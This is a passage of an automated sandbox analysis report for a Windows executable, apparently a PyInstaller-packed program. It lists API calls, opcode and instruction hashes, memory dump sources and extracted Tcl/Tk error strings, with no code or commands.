                                                            • Instruction ID: 7b6b5a5cc206741c3eed9e36d846211f476e50eb1a3894a2249c93769cb93adf
                                                            • Opcode Fuzzy Hash: 9c71bbc92960716eb9d411b0b48861d3e4dcea1db34bc3604978879cc3cc685b
                                                            • Instruction Fuzzy Hash: 5991D672E186D195F750AF2594402BD2BA0BB44B88F14417BDE0ED7A84EF38E462EBC0

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _get_daylight$_isindst
                                                            • String ID:
                                                            • API String ID: 4170891091-0
                                                            • Opcode ID: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                            • Instruction ID: f56275187c7ec62ffda404b6b9db8c8aaab44cbabbbd82643d4dcc29f87ef1d4
                                                            • Opcode Fuzzy Hash: 576313037ba361094b23b779854add166a997b8059c5947e2a7d8f77b38f16ad
                                                            • Instruction Fuzzy Hash: 1B512772F046929AFB24EF34D9556BC6BA1AB40358F100137DD1E92AE5FF38A41AD7C0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                            • String ID:
                                                            • API String ID: 2780335769-0
                                                            • Opcode ID: a7b857db6b01e19318b34c0e1f4ae245464e2a3bbbae32caf4e8ae7d5ae051c5
                                                            • Instruction ID: f75d76de4dfa3c75cdbe327fa54107f4f41301e12249881519b87b72fb8665da
                                                            • Opcode Fuzzy Hash: a7b857db6b01e19318b34c0e1f4ae245464e2a3bbbae32caf4e8ae7d5ae051c5
                                                            • Instruction Fuzzy Hash: 78516E32E086C18AFB10EF61D4513BD33B1AB54B58F148676DE4D87699FF38E4A09780
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 1452418845-0
                                                            • Opcode ID: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                            • Instruction ID: baf909013fd7070890fea7f75496f17925fc5212afb5746afdf193aa026038e3
                                                            • Opcode Fuzzy Hash: 416c85195b1c4a12d0bca0f9f3e62a22dfdeb9afd9333f8228f8268f9139cf84
                                                            • Instruction Fuzzy Hash: 19312821E4C6C781FA24BB64D8513BD23919F41788F464037E90EC76DBFE2DB8A4A2C1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 1279662727-0
                                                            • Opcode ID: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                            • Instruction ID: 2f9509dedbf0757159a538401dd220fd6de2d4d695ee9f232245f1ea20454e15
                                                            • Opcode Fuzzy Hash: 4e99df99e7301f39d701a276f02ef329721f1d5d609599a82ba0c959db36bcb5
                                                            • Instruction Fuzzy Hash: 0E419D32D187C283E750AB2095113AD6760FF947A4F109376EA9C83AD6FF6CA5F09780
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentExitTerminate
                                                            • String ID:
                                                            • API String ID: 1703294689-0
                                                            • Opcode ID: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                            • Instruction ID: ea93c62fb0832dac774a8afb0d56a1a760fab88834f54f6a1ad77667345dec37
                                                            • Opcode Fuzzy Hash: 8770705702221fa6c619df89f3c2f6fa117b36761db68559c6d5aced1687d582
                                                            • Instruction Fuzzy Hash: 10D09210F086CA62EB183F7558990BC12156F88709F14187ED80B87797FD3DBCAEA2C0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                            • Instruction ID: a48c79914cf000c25839ba9665b1ae4039475b05ab6e05d05d183d6ee47feab7
                                                            • Opcode Fuzzy Hash: 7abeb8fe783ee1c87e05308e58bf334fc2d3c30e054771bdd4fe3d83d7422279
                                                            • Instruction Fuzzy Hash: D9510521F496C286EB78FE26940067E6281EF41BA9F144776DD6C877C5EF3CE460A6C0
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6DD66AF99,?,?,00000000,00007FF6DD66B04E), ref: 00007FF6DD66B18A
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD66AF99,?,?,00000000,00007FF6DD66B04E), ref: 00007FF6DD66B194
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                            • String ID:
                                                            • API String ID: 1687624791-0
                                                            • Opcode ID: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                            • Instruction ID: 81c162daaf9df48c6f3751663e588d17e17493b0856033fdef6f0e269517839e
                                                            • Opcode Fuzzy Hash: b40b4e21971f44bf7084fa7db8f9dedbad63d491ac625d0e9d3072d74158efd6
                                                            • Instruction Fuzzy Hash: 8F21D421F186C2A1FE907B38945427D53815F847A0F4452B7DA1DC73C2FE2CF865A2C1
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastPointer
                                                            • String ID:
                                                            • API String ID: 2976181284-0
                                                            • Opcode ID: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                            • Instruction ID: d783cd0d1c63078679af9ae4354bab3735296329cb7ccff8c2fb1d90decd83d5
                                                            • Opcode Fuzzy Hash: b08d68fc7a6d73a6a6e4925e4a9dc39ae2e5fb86b78546c657aad159ae176ccc
                                                            • Instruction Fuzzy Hash: 1611C162E18BC181EA10AB25A80416D6B61AB44BF4F540372EEBD877D9EF3CD46197C0
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD665911), ref: 00007FF6DD665A2F
                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD665911), ref: 00007FF6DD665A45
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: Time$System$FileLocalSpecific
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD667F39), ref: 00007FF6DD6680DF
                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6DD667F39), ref: 00007FF6DD6680F5
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: Time$System$FileLocalSpecific
                                                            APIs
                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF22
                                                            • GetLastError.KERNEL32(?,?,?,00007FF6DD673392,?,?,?,00007FF6DD6733CF,?,?,00000000,00007FF6DD673895,?,?,00000000,00007FF6DD6737C7), ref: 00007FF6DD66AF2C
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            APIs
                                                              • Part of subcall function 00007FF6DD658AE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6DD652ABB), ref: 00007FF6DD658B1A
                                                            • _findclose.LIBCMT ref: 00007FF6DD657F99
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: ByteCharMultiWide_findclose
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: _fread_nolock
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6DD66B9A6,?,?,?,00007FF6DD66AB67,?,?,00000000,00007FF6DD66AE02), ref: 00007FF6DD66F1AD
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                            • Instruction ID: 2d789996dea538ec8d18f01b4a17c4b9408815592a989b868f9158c42406d01e
                                                            • Opcode Fuzzy Hash: 3903a8e07e771c3ce20f22a7cfda351bfc6825da59dd5d1b3ed6874a84ef80bd
                                                            • Instruction Fuzzy Hash: 76F06D65F0928691FE547771D9112BD82A15F88BC0F4C4473CD0EC63C2FE1CE4A8A2D0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,?,?,00007FF6DD660D24,?,?,?,00007FF6DD662236,?,?,?,?,?,00007FF6DD663829), ref: 00007FF6DD66DBFA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                            • Instruction ID: 94d13e19f79453ed7a9a4d67dff89b14a035e130de655bce4501a181f455e35f
                                                            • Opcode Fuzzy Hash: 4a58605cc4c1e1369a1067e1172dc77d995423b1642967883a658540b08b4ee9
                                                            • Instruction Fuzzy Hash: B6F05E50F0C2CA51FE547661980127D11949F48BB0F0806B2D82EC62C1FE5CB4A0B9D0
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: DirectoryErrorLastRemove
                                                            • String ID:
                                                            • API String ID: 377330604-0
                                                            • Opcode ID: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
                                                            • Instruction ID: fbb3bc7a4ee49d0fdde2af07d1e1862442e7ec43207bce7adeaba7016877b1d6
                                                            • Opcode Fuzzy Hash: 5fa28e36025bd9fe9b761eb46eefd3724bf101683452c01a56c5c02a220ce566
                                                            • Instruction Fuzzy Hash: AB418516D1C6C581EB51AB28D5012FD6360FBA9744F94A233DF8D82593FF28E6E8D380
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: Failed to get address for Tcl_Alloc$Failed to get address for Tcl_ConditionFinalize$Failed to get address for Tcl_ConditionNotify$Failed to get address for Tcl_ConditionWait$Failed to get address for Tcl_CreateInterp$Failed to get address for Tcl_CreateObjCommand$Failed to get address for Tcl_CreateThread$Failed to get address for Tcl_DeleteInterp$Failed to get address for Tcl_DoOneEvent$Failed to get address for Tcl_EvalEx$Failed to get address for Tcl_EvalFile$Failed to get address for Tcl_EvalObjv$Failed to get address for Tcl_Finalize$Failed to get address for Tcl_FinalizeThread$Failed to get address for Tcl_FindExecutable$Failed to get address for Tcl_Free$Failed to get address for Tcl_GetCurrentThread$Failed to get address for Tcl_GetObjResult$Failed to get address for Tcl_GetString$Failed to get address for Tcl_GetVar2$Failed to get address for Tcl_Init$Failed to get address for Tcl_MutexLock$Failed to get address for Tcl_MutexUnlock$Failed to get address for Tcl_NewByteArrayObj$Failed to get address for Tcl_NewStringObj$Failed to get address for Tcl_SetVar2$Failed to get address for Tcl_SetVar2Ex$Failed to get address for Tcl_ThreadAlert$Failed to get address for Tcl_ThreadQueueEvent$Failed to get address for Tk_GetNumMainWindows$Failed to get address for Tk_Init$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                            • API String ID: 190572456-2208601799
                                                            • Opcode ID: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                            • Instruction ID: e3d8a1f1d2f774e5a18ed3f278fc7039427592b169febe52e8571f85004dbc13
                                                            • Opcode Fuzzy Hash: 7c721144a29f82c0df2178d2ac20e82e85a8926ad6b3cde14d1131664071774a
                                                            • Instruction Fuzzy Hash: 72E1C764E0DBC7F0FA14AB48EC441BC63A1AF05750F945537C80E86AA5FF7CB5A8E690
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$Create$Move$ObjectSelect$#380BaseClientDialogDrawFontIndirectInfoParametersRectReleaseSystemTextUnits
                                                            • String ID: BUTTON$Close$EDIT$Failed to execute script '%ls' due to unhandled exception: %ls$STATIC
                                                            • API String ID: 2446303242-1601438679
                                                            • Opcode ID: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                            • Instruction ID: 96267e7a39ed37b2c8fa5717543ade4aa3fec7591f7e3bd4dd0541934abc3194
                                                            • Opcode Fuzzy Hash: 2b11bbb19a83a086465840dcd7a103c40d81e06c4cc6566eb68c4ee1e4e9da55
                                                            • Instruction Fuzzy Hash: 51A19A36A08BC9A7E7149F25E44479EB360F788B84F504126DB9D43B28DF3DE5A4CB80
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 3140674995-0
                                                            • Opcode ID: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                            • Instruction ID: ef3a796389383baf237a3251468b9fcf8a113fcdcda429237b4c53dbf1e07d3e
                                                            • Opcode Fuzzy Hash: 2f0e84db8cb7341a902ef28a41a93ef6eb2637ed36960dc0fb1294147411c1b9
                                                            • Instruction Fuzzy Hash: FC317072A09BC19AEB60AF64E8403FD3360FB84744F44403ADA4E87B95EF38D698D710
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2748737218.00007FF6DD651000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6DD650000, based on PE: true
                                                            • Associated: 00000002.00000002.2748643937.00007FF6DD650000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748839678.00007FF6DD67B000.00000002.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD68E000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2748931528.00007FF6DD690000.00000004.00000001.01000000.00000009.sdmp
                                                            • Associated: 00000002.00000002.2749073357.00007FF6DD692000.00000002.00000001.01000000.00000009.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_7ff6dd650000_Mai.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                            • String ID:
                                                            • API String ID: 1239891234-0
                                                            • Opcode ID: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
                                                            • Instruction ID: 3ab8f558afcaafc136de2b4fab44ed6aa7bb444b4c83f514fb934fb085b55740
                                                            • Opcode Fuzzy Hash: 4ac1c30ff9e2098ff7eaac683efdfbba3e64979dbffe5e0d25534f02cf004e64
